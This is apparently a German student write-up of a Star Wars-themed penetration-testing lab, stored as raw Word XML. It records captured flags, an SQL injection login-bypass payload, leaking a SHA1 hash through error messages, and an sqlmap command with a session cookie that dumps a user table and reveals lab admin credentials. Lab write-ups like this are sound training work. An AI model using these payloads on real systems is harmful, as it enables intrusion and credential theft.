          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57700A4C" wp14:editId="2E27306E">
            <wp:extent cx="5400675" cy="1182370"/>
            <wp:effectExtent l="0" t="0" r="952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675" cy="1182370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A778028" w14:textId="76928F84" w:rsidR="00B44BBA" w:rsidRPr="008E799A" w:rsidRDefault="00B44BBA" w:rsidP="00B44BBA">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>n1c3_y0u_mad3_1t_t1ll_h3r3_{6c5f2498fb09242303c62eec888ed14f55195ccf55d82bc9363706e5}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F98B04A" w14:textId="4EABBF19" w:rsidR="00EA069E" w:rsidRPr="008E799A" w:rsidRDefault="00EA069E" w:rsidP="00B44BBA">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DCF02F7" w14:textId="4EA8B411" w:rsidR="00EA069E" w:rsidRPr="008E799A" w:rsidRDefault="00EA069E" w:rsidP="00B44BBA">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3910DAF3" w14:textId="1F570851" w:rsidR="00EA069E" w:rsidRPr="008E799A" w:rsidRDefault="00EA069E" w:rsidP="00B44BBA">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E6D993" w14:textId="7E80FE05" w:rsidR="00EA069E" w:rsidRDefault="006C7F97" w:rsidP="006C7F97">
      <w:r>
        <w:t xml:space="preserve">Und </w:t>
      </w:r>
      <w:r w:rsidR="001C312C">
        <w:t>in der Datenbank steht</w:t>
      </w:r>
      <w:r w:rsidR="00E00883">
        <w:t xml:space="preserve"> die nächste Flag</w:t>
      </w:r>
      <w:r w:rsidR="00D67771">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDD6D67" w14:textId="2F1B1BE8" w:rsidR="00EA069E" w:rsidRDefault="007043A5" w:rsidP="00EA069E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B4595E2" wp14:editId="62F75595">
            <wp:extent cx="5400675" cy="1008380"/>
            <wp:effectExtent l="0" t="0" r="9525"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675" cy="1008380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0A5C7D" w14:textId="6D828986" w:rsidR="00F60F1B" w:rsidRDefault="00F60F1B" w:rsidP="00F60F1B">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F60F1B">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>n0_0n3_th0ught_ab0ut_4dm1n3r_{ec328841721b182b0db10c7f6902dfabceb9ff5d43fd3a5f68b3e10a}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E2D1CA" w14:textId="41F2DB80" w:rsidR="00E712E4" w:rsidRDefault="00E712E4" w:rsidP="00F60F1B">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDB99AA" w14:textId="628AA7AD" w:rsidR="00E712E4" w:rsidRDefault="000D1FF8" w:rsidP="000D1FF8">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc438894"/>
      <w:r>
        <w:t>Level3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="7C4F7C40" w14:textId="0E453B81" w:rsidR="000D1FF8" w:rsidRPr="000D1FF8" w:rsidRDefault="000D1FF8" w:rsidP="000D1FF8">
      <w:r>
        <w:t>Bin ich leider nicht dazu gekommen, allerdings kann man indem man neue user anlegt</w:t>
      </w:r>
      <w:r w:rsidR="006D4156">
        <w:t xml:space="preserve"> mit kreativen Namen für die neuen User Zugriff auf das System bekommen</w:t>
      </w:r>
      <w:r w:rsidR="00B63FDB">
        <w:t xml:space="preserve"> wenn ich die Challenge gerade nicht verwechsle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B8FDA7" w14:textId="3CE5501E" w:rsidR="000A11B0" w:rsidRDefault="000A11B0" w:rsidP="000A11B0">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc438895"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Storm Trooper School</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="443F7660" w14:textId="6C69BC1E" w:rsidR="00917496" w:rsidRDefault="00917496" w:rsidP="00917496">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc438896"/>
      <w:r>
        <w:t>Level1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="2F62B646" w14:textId="0120DE25" w:rsidR="00917496" w:rsidRDefault="00814E59" w:rsidP="00917496">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc438897"/>
      <w:r>
        <w:t>Authentifizierung Bypass</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="7D254DB9" w14:textId="3E13858A" w:rsidR="007C5F68" w:rsidRDefault="00CD2781" w:rsidP="00CD2781">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD2781">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>" or 1=1) #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF6CD83" w14:textId="02530EB9" w:rsidR="00CD2781" w:rsidRDefault="00CD2781" w:rsidP="00CD2781">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476885FB" w14:textId="5B48F1DF" w:rsidR="00CD2781" w:rsidRDefault="00E75A1E" w:rsidP="00CD2781">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Hier liegt eine SQL-Injection Schwachstelle vor. Um sich einzuloggen </w:t>
      </w:r>
      <w:r w:rsidR="007175FE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">lann man entweder den Usernamen umgehen und mit </w:t>
      </w:r>
      <w:r w:rsidR="00477B81">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>dem or-Operator arbeiten um sich einzuloggen</w:t>
      </w:r>
      <w:r w:rsidR="00A8671E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">(siehe oben) oder man erfährt das es den Imperator User gibt </w:t>
      </w:r>
      <w:r w:rsidR="00765D3F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>aus einer späteren Aufgabe und verwendetet den Usernamen (siehe unten)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F6E990" w14:textId="333A21C8" w:rsidR="00C6158B" w:rsidRPr="007C5F68" w:rsidRDefault="00C6158B" w:rsidP="00C6158B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="101D0450" wp14:editId="337D4594">
            <wp:extent cx="5400675" cy="2235200"/>
            <wp:effectExtent l="0" t="0" r="9525"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2235200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5054CDCB" w14:textId="295B0990" w:rsidR="00C6158B" w:rsidRDefault="00C6158B" w:rsidP="00C6158B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7668EB8B" wp14:editId="104BCDC7">
            <wp:extent cx="5400675" cy="3053715"/>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675" cy="3053715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="248AA165" w14:textId="2555242D" w:rsidR="00C6158B" w:rsidRPr="00C6158B" w:rsidRDefault="00C6158B" w:rsidP="00C6158B">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r w:rsidRPr="00C6158B">
        <w:t>c0m3_t0_th3_d4rk_s1de_w3_h4ve_c00kies_{ec157ece34725dfe4faef7e5145700189f0b19cd35012bbc80563ff2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9A43C9" w14:textId="16F6D0B2" w:rsidR="00814E59" w:rsidRDefault="005026FA" w:rsidP="000F5415">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc438898"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Verwendetes Hashverfahren:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="15B0F311" w14:textId="09E34140" w:rsidR="005026FA" w:rsidRDefault="005026FA" w:rsidP="005026FA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28C9246E" wp14:editId="6BA6FE4C">
            <wp:extent cx="5400675" cy="614680"/>
            <wp:effectExtent l="0" t="0" r="952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614680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4AE626" w14:textId="54D9F2E9" w:rsidR="005026FA" w:rsidRDefault="005026FA" w:rsidP="005026FA">
      <w:r>
        <w:t>Aus dem verwendeten Password und dem daraus erzeugten Hash folgt, dass ein SHA1 Hash Verfahren verwendet wurde.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4848C5B6" w14:textId="7B24C5C4" w:rsidR="00791450" w:rsidRDefault="00791450" w:rsidP="005026FA">
      <w:r>
        <w:t xml:space="preserve">Den Hash kann man sehen </w:t>
      </w:r>
      <w:r w:rsidR="00D02370">
        <w:t>indem man seinen Request so baut, dass eine Fehlermeldung entsteht, die den Hash mit ausgibt</w:t>
      </w:r>
      <w:r w:rsidR="00F72F66">
        <w:t xml:space="preserve"> um auf die falsche Syntax der Datenbankabfrage hinzuweisen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480D1369" w14:textId="42ABFBE5" w:rsidR="005026FA" w:rsidRDefault="003F5D00" w:rsidP="003F5D00">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc438899"/>
      <w:r>
        <w:t>Level 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="5AEB4580" w14:textId="3AC633AA" w:rsidR="00B029D1" w:rsidRPr="00B029D1" w:rsidRDefault="00B029D1" w:rsidP="00B029D1">
      <w:r>
        <w:t>Nicht bearbeitet:/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DBAF10" w14:textId="7C60D309" w:rsidR="002405CE" w:rsidRDefault="002405CE" w:rsidP="002405CE">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc438900"/>
      <w:r>
        <w:t>Bonus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="298CFCA7" w14:textId="19FF3F99" w:rsidR="00B029D1" w:rsidRDefault="00B029D1" w:rsidP="00B029D1">
      <w:r>
        <w:t>Nicht bearbeitet:/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70378A59" w14:textId="236EC480" w:rsidR="00B029D1" w:rsidRDefault="00B029D1" w:rsidP="00B029D1">
      <w:r>
        <w:t>Aber in Kurzform:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F9C6D7" w14:textId="57FEF367" w:rsidR="00907265" w:rsidRDefault="00B029D1" w:rsidP="00B029D1">
      <w:r>
        <w:t xml:space="preserve">Das Risiko </w:t>
      </w:r>
      <w:r w:rsidR="00000B9D">
        <w:t xml:space="preserve">das die Schwachstelle ausgenutzt wird, </w:t>
      </w:r>
      <w:r>
        <w:t>ist sehr</w:t>
      </w:r>
      <w:r w:rsidR="00000B9D">
        <w:t xml:space="preserve"> Hoch da sie zum einen </w:t>
      </w:r>
      <w:r w:rsidR="007D585D">
        <w:t xml:space="preserve">ohne großen Aufwand ausgenutzt werden kann und sich zum anderen in einem Labor </w:t>
      </w:r>
      <w:r w:rsidR="00F12FA5">
        <w:t>für Penetrationtesting befindet wo auf diese Schwachstellen untersucht werden soll.</w:t>
      </w:r>
      <w:r w:rsidR="00907265">
        <w:t xml:space="preserve"> Auch wenn die Schwachstelle </w:t>
      </w:r>
      <w:r w:rsidR="00F01E21">
        <w:t>in einem anderen Bereich und öffentlich zugänglich wäre, wäre das Risiko sehr hoch auf</w:t>
      </w:r>
      <w:r w:rsidR="00CB2939">
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00F01E21">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00CB2939">
        <w:t>und der einfachen Möglichkeit das auszunutzen.</w:t>
      </w:r>
      <w:r w:rsidR="00F01E21">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B751513" w14:textId="574AED35" w:rsidR="00B029D1" w:rsidRPr="00B029D1" w:rsidRDefault="00907265" w:rsidP="00B029D1">
      <w:r>
        <w:t>Die Auswirkung ist dabei sehr gering</w:t>
      </w:r>
      <w:r w:rsidR="00B029D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB2939">
        <w:t xml:space="preserve">in diesem Fall da keine Vertraulichen daten </w:t>
      </w:r>
      <w:r w:rsidR="00783FF7">
        <w:t>verloren gehen, die einen Ruf</w:t>
      </w:r>
      <w:r w:rsidR="00474982">
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="00783FF7">
        <w:t>erlust oder Finanziellen</w:t>
      </w:r>
      <w:r w:rsidR="00474982">
        <w:t xml:space="preserve"> Schaden verursachen. Anders </w:t>
      </w:r>
      <w:r w:rsidR="00F70BBB">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00474982">
        <w:t xml:space="preserve">ähe es </w:t>
      </w:r>
      <w:r w:rsidR="00F70BBB">
        <w:t xml:space="preserve">hier aus wenn diese Seite öffentlich wäre und vertrauliche Daten </w:t>
      </w:r>
      <w:r w:rsidR="00732A4B">
        <w:t>o.ä. enthielte. Dann wäre die Auswirkung natürlich auch sehr hoch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9284AD" w14:textId="6D66CD18" w:rsidR="000A11B0" w:rsidRDefault="000A11B0" w:rsidP="000A11B0">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc438901"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Jabba the Hutt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="1BD700C4" w14:textId="2FBCACB5" w:rsidR="00FF74EB" w:rsidRDefault="00725F77" w:rsidP="00FF74EB">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc438902"/>
      <w:r>
        <w:t>Level 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="743A7238" w14:textId="1113C153" w:rsidR="00725F77" w:rsidRDefault="008715C0" w:rsidP="00725F77">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc438903"/>
      <w:r>
        <w:t>Host</w:t>
      </w:r>
      <w:r w:rsidR="00725F77">
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="31A49E7E" w14:textId="4D57C5C4" w:rsidR="00F1153E" w:rsidRDefault="00725F77" w:rsidP="007218B0">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
      </w:pPr>
      <w:r>
        <w:t>jabba.tatooine.space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4ADFEC" w14:textId="1CC6EEE7" w:rsidR="00F1153E" w:rsidRDefault="00F1153E" w:rsidP="00F1153E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="392B0FFD" wp14:editId="6A783C5B">
            <wp:extent cx="5400675" cy="506095"/>
            <wp:effectExtent l="0" t="0" r="9525" b="825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675" cy="506095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C7DF39" w14:textId="26DF90A2" w:rsidR="004E20D3" w:rsidRDefault="004E20D3" w:rsidP="00F1153E">
      <w:r>
        <w:t xml:space="preserve">Aus der Fehlermeldung lässt sich erkennen, dass </w:t>
      </w:r>
      <w:r w:rsidR="00E62C00">
        <w:t>der Bot versucht den Host jabba.tatooine.space anzusprechen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480586C4" w14:textId="7EFB1EC0" w:rsidR="008715C0" w:rsidRDefault="00062363" w:rsidP="008715C0">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc438904"/>
      <w:r>
        <w:t>Aufgerufene URLs:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="02D7A630" w14:textId="1AFC1123" w:rsidR="00062363" w:rsidRPr="00BF436A" w:rsidRDefault="00062363" w:rsidP="00062363">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF436A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Authentifzierung:</w:t>
      </w:r>
      <w:r w:rsidR="00BF436A" w:rsidRPr="00BF436A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Full request URI: http://jabba.tatooine.space/jabbathehutt/923919239128911292.php]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBFA279" w14:textId="463B95FA" w:rsidR="00062363" w:rsidRDefault="00E15270" w:rsidP="00062363">
      <w:r>
        <w:t>Instruktionen:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E15270">
        <w:t xml:space="preserve"> [Full request URI: </w:t>
      </w:r>
      <w:hyperlink r:id="rId66" w:history="1">
        <w:r w:rsidR="0059633F" w:rsidRPr="007B7B67">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://jabba.tatooine.space/jabbathehutt/234023492910910239103901.php?id=29</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E15270">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764314A9" w14:textId="45CA93EF" w:rsidR="0059633F" w:rsidRDefault="0059633F" w:rsidP="00062363">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="176F1EB9" wp14:editId="026F92EA">
            <wp:extent cx="5400675" cy="650240"/>
            <wp:effectExtent l="0" t="0" r="9525"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675" cy="650240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A169D" w14:textId="5188656B" w:rsidR="00F11532" w:rsidRDefault="00F11532" w:rsidP="00F11532">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc438905"/>
      <w:r>
        <w:t>Level 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="78A7980E" w14:textId="069198F3" w:rsidR="005556BC" w:rsidRPr="005556BC" w:rsidRDefault="005556BC" w:rsidP="005556BC">
      <w:r>
        <w:t>Nicht bearbeitet:/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669E4400" w14:textId="5C3A92B3" w:rsidR="000A11B0" w:rsidRDefault="000A11B0" w:rsidP="000A11B0">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc438906"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Escape from Kessel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="4E1AC8D9" w14:textId="2E3B3783" w:rsidR="009C0EA2" w:rsidRDefault="00ED3052" w:rsidP="00ED3052">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc438907"/>
      <w:r>
        <w:t>Level 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="30B599CB" w14:textId="0CB8AFB4" w:rsidR="00ED3052" w:rsidRDefault="00ED3052" w:rsidP="00ED3052">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc438908"/>
      <w:r>
        <w:t>Gain administrative Access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="30CD747B" w14:textId="20B4FF59" w:rsidR="00ED3052" w:rsidRDefault="00ED3052" w:rsidP="00ED3052">
      <w:r>
        <w:t xml:space="preserve">Nach dem Einloggen mit den angegebenen Zugangsdaten sieht man verschiedene Aktionsmöglichkeiten. Diese werden jeweils durch ein PHP Skript mit Parameter ausgeführt. Beim Test mit sqlmap konnte keine Schwachstelle festgestellt werden. Schaut man sich die Seite danach allerdings noch einmal genauer an, so kann man in Burpsuit oder </w:t>
      </w:r>
      <w:r w:rsidR="0024547B">
        <w:t xml:space="preserve">mit den Entwicklertools von Firefox feststellen, dass auch die Bilder über ein PHP-Skript geladen werden. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3AF81B" w14:textId="5883E8C1" w:rsidR="00ED3052" w:rsidRDefault="00ED3052" w:rsidP="00ED3052">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5473B76F" wp14:editId="1F6CE68A">
            <wp:extent cx="5400675" cy="859790"/>
            <wp:effectExtent l="0" t="0" r="952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675" cy="859790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57850D80" w14:textId="03943107" w:rsidR="0024547B" w:rsidRDefault="0024547B" w:rsidP="00ED3052">
      <w:r>
        <w:t>Nimmt man nun statt dem oberen Befehl die URL für die Bilderrequests und überprüft nun auf Schwach</w:t>
      </w:r>
      <w:r w:rsidR="00AE5A47">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>tellen, so findet man heraus, dass der Parameter „profile_id“ ausgenutzt werden kann.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F016C21" w14:textId="1D5BF37F" w:rsidR="0024547B" w:rsidRDefault="0024547B" w:rsidP="00ED3052">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B98FF2A" wp14:editId="3185E90D">
            <wp:extent cx="5400675" cy="343535"/>
            <wp:effectExtent l="0" t="0" r="952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675" cy="343535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7797C02E" w14:textId="2C432311" w:rsidR="0024547B" w:rsidRDefault="0024547B" w:rsidP="00ED3052">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CE41719" wp14:editId="1896267A">
            <wp:extent cx="5400675" cy="320040"/>
            <wp:effectExtent l="0" t="0" r="9525" b="381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675" cy="320040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A50617" w14:textId="3FAE9E34" w:rsidR="0024547B" w:rsidRDefault="0024547B" w:rsidP="00ED3052">
      <w:r>
        <w:t xml:space="preserve">Mit der option --tables </w:t>
      </w:r>
      <w:r w:rsidR="00E3201A">
        <w:t>kann man sich nun alle Tabellen ausgeben lassen und findet einen Eintrag „user“. Setzt man nun anstatt Tables die Optionen „-T user --user“ erhält man alle Einträge des Tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F812D3" w14:textId="054FAB79" w:rsidR="00E3201A" w:rsidRPr="008E799A" w:rsidRDefault="00E3201A" w:rsidP="00E3201A">
      <w:pPr>
        <w:pStyle w:val="Computerprogramm"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E799A">
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>sqlmap -u 'http://10.85.229.196/kessel/image.php?profile_id=5122&amp;size=small' --cookie='PHPSESSID=bpoe0bq8nhebklhs4jtdun9b73' -p 'profile_id' -T user –dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F654DB" w14:textId="78AD16F7" w:rsidR="00E3201A" w:rsidRDefault="00E3201A" w:rsidP="00E3201A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33F3BC2E" wp14:editId="13A9FE89">
            <wp:extent cx="2603500" cy="657227"/>
            <wp:effectExtent l="0" t="0" r="6350" b="952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2755" cy="664612"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2356F20D" w14:textId="1E282237" w:rsidR="00E3201A" w:rsidRDefault="00E3201A" w:rsidP="00E3201A">
      <w:r>
        <w:t>So lässt sich ganz einfach der Admin User und das dazugehörige Passwort herausfinden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B56CE1" w14:textId="4B403942" w:rsidR="00E3201A" w:rsidRDefault="00E3201A" w:rsidP="00E3201A">
      <w:r>
        <w:t>Wenn man sich jetzt mit „Sly Moore“ und „sly_as_a_fox“ einloggt kann man den Wookie freilassen und erhält die Flagge:</w:t>
